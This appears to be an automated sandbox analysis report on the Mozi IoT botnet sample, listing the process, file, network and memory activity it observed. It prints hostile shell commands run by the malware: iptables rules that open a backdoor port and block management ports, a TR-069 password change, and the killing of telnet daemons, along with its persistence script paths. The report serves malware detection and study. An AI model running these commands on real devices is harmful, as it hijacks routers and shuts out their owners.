Source: /usr/bin/killall (PID: 5229) File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1594/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/120/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/121/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1349/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/122/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/243/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/123/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/124/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/125/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/126/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1344/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1465/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1586/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/127/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/6/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/248/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/128/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/249/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1463/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/800/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/801/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1900/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/26/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/27/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/491/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/250/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/130/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/251/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/252/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/132/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/253/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/254/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/255/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/256/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1599/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/257/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1477/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/379/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/258/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1476/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/259/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1475/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5039/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/936/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2208/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/35/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1809/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1494/stat Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m.3 (PID: 5226) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/Mozi.m.3 (PID: 5251) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5260) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5263) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5268) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5271) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5274) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5277) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5280) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5285) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5288) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5291) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5294) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5297) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/Mozi.m.3 (PID: 5299) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/Mozi.m.3 (PID: 5301) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5304) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5307) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5310) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5313) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5316) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5319) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5322) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5325) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5328) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5332) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5335) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5347) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5350) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5353) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5356) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5359) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5362) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5365) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5368) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection

Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/S95baby.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/keyboard-setup.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/console-setup.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/hwclock.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /usr/bin/gettext.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /usr/bin/rescan-scsi-bus.sh
Source: unknown Network traffic detected: HTTP traffic on port 32814 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35686 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 81 -> 35686
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81

Malware Analysis System Evasion

Source: /tmp/Mozi.m.3 (PID: 5220) Queries kernel information via 'uname':
Source: /tmp/Mozi.m.3 (PID: 5224) Queries kernel information via 'uname':
Source: /tmp/Mozi.m.3 (PID: 5234) Queries kernel information via 'uname':
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.12.dr Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: functions.sh2.12.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm.sh.12.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.12.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.12.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.12.dr Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: Mozi.m.3, 5220.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5222.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp Binary or memory string: Gx86_64/usr/bin/qemu-arm/tmp/Mozi.m.3SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.3
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.12.dr Binary or memory string: identify_qemu_args () {
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.12.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.12.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.12.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: Mozi.m.3, 5220.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5222.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5242.1.00000000b2458519.00000000598fe62f.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.12.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.12.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.12.dr Binary or memory string: print "needqemurun="
Source: functions.sh2.12.dr Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -z "$qemu_pid" || kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm.sh.12.dr Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.12.dr Binary or memory string: # Generate qemu -append arguments
Source: Mozi.m.3, 5220.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5222.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp Binary or memory string: qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: functions.sh2.12.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.12.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh2.12.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: kvm.sh.12.dr Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.12.dr Binary or memory string: identify_qemu () {
Source: parse-console.sh.12.dr Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.12.dr Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: kvm-test-1-run.sh.12.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.12.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: functions.sh2.12.dr Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.12.dr Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: functions.sh2.12.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.12.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.12.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.12.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386|qemu-system-aarch64)
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64)
Source: functions.sh2.12.dr Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: functions.sh2.12.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.12.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_pid=""
Source: kvm-test-1-run.sh.12.dr Binary or memory string: elif test -z "$qemu_pid"
Source: functions.sh2.12.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: Mozi.m.3, 5220.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5222.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5242.1.00000000b2458519.00000000598fe62f.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.12.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.12.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: functions.sh2.12.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MEM=$2
Source: kvm-test-1-run.sh.12.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.12.dr Binary or memory string: specify_qemu_cpus () {
Source: functions.sh2.12.dr Binary or memory string: qemu-system-i386)
Source: functions.sh2.12.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.12.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.12.dr Binary or memory string: print "needqemurun="
Source: functions.sh2.12.dr Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.12.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.12.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.12.dr Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.12.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.12.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh2.12.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.12.dr Binary or memory string: --qemu-cmd)
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.12.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh2.12.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information

Source: Yara match File source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: Mozi.m.3, type: SAMPLE
Source: Yara match File source: 5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5222, type: MEMORYSTR
Source: Yara match File source: /usr/networks, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: Mozi.m.3, type: SAMPLE
Source: Yara match File source: 5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5222, type: MEMORYSTR
Source: Yara match File source: /usr/networks, type: DROPPED